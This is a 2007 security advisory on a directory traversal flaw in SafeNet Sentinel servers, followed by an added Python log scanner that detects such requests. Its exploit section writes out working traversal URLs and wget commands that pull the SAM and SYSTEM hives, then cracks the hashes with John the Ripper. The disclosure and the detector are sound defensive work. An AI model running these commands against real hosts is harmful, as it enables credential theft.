sentineldetails-traverse.txt

27 Nov 2007 | Reported by Elliot Kendall | Type: packetstorm | Source: packetstormsecurity.com

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server are vulnerable to directory traversal attacks, allowing remote attackers to read sensitive files, including system password hashes

`SUMMARY  
=======  
  
SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server  
products include web servers which are vulnerable to directory  
traversal attacks. A remote attacker could exploit these  
vulnerabilities to read arbitrary files with the permissions of the web  
server, typically SYSTEM.  
  
AFFECTED SOFTWARE  
=================  
  
* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below  
* Sentinel Keys Server 1.0.3 and possibly below  
  
UNAFFECTED  
==========  
  
* Sentinel Protection Server 7.4.1  
* Sentinel Keys Server 1.0.4  
  
IMPACT  
======  
  
A remote attacker could exploit this vulnerability to read sensitive  
files on the affected system. Attractive targets include the SAM  
registry hive which contains system password hashes.  
  
DETAILS  
=======  
  
Sentinel Protection Server and Sentinel Keys Server run web servers on  
ports 6002 and 7002, respectively, to allow remote monitoring of key  
use. The web server software does not sanitize request paths correctly  
before using them in system calls. As a result, an attacker can request  
files outside the web server's directory root by using the ../ notation  
to refer to the parent directory of the current directory.  
  
SOLUTION  
========  
  
Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server  
1.0.4.  
  
First upgrade the Sentinel Driver software to 7.4.0 if you are using an  
earlier version.  
  
http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip  
  
Then install "Security Patch to Sentinel Protection Installer 7.4.0"  
  
http://safenet-inc.com/support/files/SPI740SecurityPatch.zip  
  
EXPLOIT  
=======  
  
Most popular web browsers are not able to display URLs exploiting  
this problem. I recommend using wget or lynx instead.  
  
Substitute port 7002 to target Keys Server instead of Protection  
Server.  
  
This example will retrieve the C:\boot.ini file.  
  
http://XX.XX.XX.XX:6002/../../../../../../boot.ini  
  
This example will retrieve a copy of the target system's SAM registry  
hive from the Windows repair folder:  
  
http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam  
  
With the SAM and SYSTEM registry hives, it is possible to extract the  
system's local password hashes for offline cracking. For example, using the  
bkhive, samdump2, and John the Ripper tools:  
  
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam  
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system  
$ bkhive system keyfile  
$ samdump2 sam keyfile > hashes  
$ john --wordlist=all hashes  
  
http://ophcrack.sourceforge.net/bkhive.php  
http://www.openwall.com/john/  
  
ACKNOWLEDGMENTS  
===============  
  
Thanks to SafeNet for patching this vulnerability and for working with  
me on this advisory.  
  
According to Digital Defense, Inc.'s advisory, Corey Lebleu originally  
discovered this problem on October 10th, 2007. I discovered the same  
vulnerability independently on October 29th, 2007. I have no reason to  
doubt Digital Defense, Inc.'s claim, and do not claim to have  
discovered the problem first.  
  
REVISION HISTORY  
================  
  
2007-11-26 original release  
  
--   
Elliot Kendall <[email protected]>  
Network Security Architect  
Brandeis University  
  
Trouble replying? See http://people.brandeis.edu/~ekendall/sign/  
`
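
For defenders, the request pattern described under DETAILS can be flagged in proxy or firewall logs for ports 6002 and 7002. The Python below is an added example, not part of the original advisory; the log line format, the names `escapes_root` and `scan`, and the sample addresses are constructed assumptions. It also decodes percent-encoded and backslash-separated forms, which goes beyond the plain ../ form the advisory shows.

```python
import re
from urllib.parse import unquote

SENTINEL_PORTS = {6002, 7002}  # Protection Server, Keys Server (per the advisory)

# Constructed log format (assumption): "<time> <src> <dst>:<port> <method> <raw-target>"
LINE_RE = re.compile(
    r"^(?P<time>\S+) (?P<src>\S+) \S+:(?P<port>\d+) \S+ (?P<target>\S+)$")

def escapes_root(raw_target: str, max_decode: int = 3) -> bool:
    """True if the request path climbs above the server's document root."""
    path = raw_target.split("?", 1)[0]
    # Decode a few times so single- and double-encoded dots/slashes are seen.
    for _ in range(max_decode):
        path = unquote(path)
    depth = 0
    # Windows accepts both separators, so split on either one.
    for seg in re.split(r"[\\/]+", path):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:      # walked above the root at this point
                return True
        else:
            depth += 1
    return False

def scan(lines):
    """Return (time, src, port, target) for traversal requests to Sentinel ports."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m and int(m["port"]) in SENTINEL_PORTS and escapes_root(m["target"]):
            hits.append((m["time"], m["src"], int(m["port"]), m["target"]))
    return hits

# Constructed sample lines; addresses are from documentation ranges.
SAMPLE = [
    "2007-11-27T10:00:01Z 198.51.100.7 192.0.2.10:6002 GET /index.html",
    "2007-11-27T10:00:05Z 198.51.100.7 192.0.2.10:6002 GET /../../../../../../boot.ini",
    "2007-11-27T10:00:09Z 198.51.100.7 192.0.2.10:7002 GET /%2e%2e%5c%2e%2e%5cwinnt/repair/sam",
    "2007-11-27T10:00:12Z 198.51.100.8 192.0.2.10:7002 GET /help/../status.html",
    "2007-11-27T10:00:15Z 198.51.100.9 192.0.2.10:80 GET /../../boot.ini",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A path such as `/help/../status.html` stays inside the root and is not flagged; only requests whose running depth drops below zero are reported.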
